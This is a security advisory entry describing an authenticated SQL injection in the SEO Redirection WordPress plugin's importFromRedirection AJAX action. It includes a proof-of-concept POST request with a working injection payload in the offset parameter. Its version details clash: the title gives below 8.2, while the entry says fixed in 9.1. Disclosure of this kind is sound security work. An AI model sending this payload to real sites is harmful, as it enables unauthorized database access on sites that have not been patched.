WordPress Plugin Vulnerabilities
SEO Redirection < 8.2 - Subscriber+ SQL Injection
Description
The importFromRedirection AJAX action of the plugin, available to any authenticated user, does not properly sanitise the offset parameter before using it in a SQL statement, leading an SQL injection when the redirection plugin is also installed
Proof of Concept
POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Cookie: [any authenticated user] Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 126 action=importFromRedirection&offset=1+procedure+analyse(updatexml(rand(),concat(0x3a,benchmark(20000000,sha1(1))),0x20),1)--+-
Affects Plugins
Fixed in version 9.1
References
Classification
Miscellaneous
Original Researcher
ZhongFu Su(JrXnm) of Wuhan University
Submitter
ZhongFu Su(JrXnm) of Wuhan University
Submitter website
Verified
Yes
Timeline
Publicly Published
2021-10-18 (about 1 years ago)
Added
2021-10-18 (about 1 years ago)
Last Updated
2022-09-26 (about 2 months ago)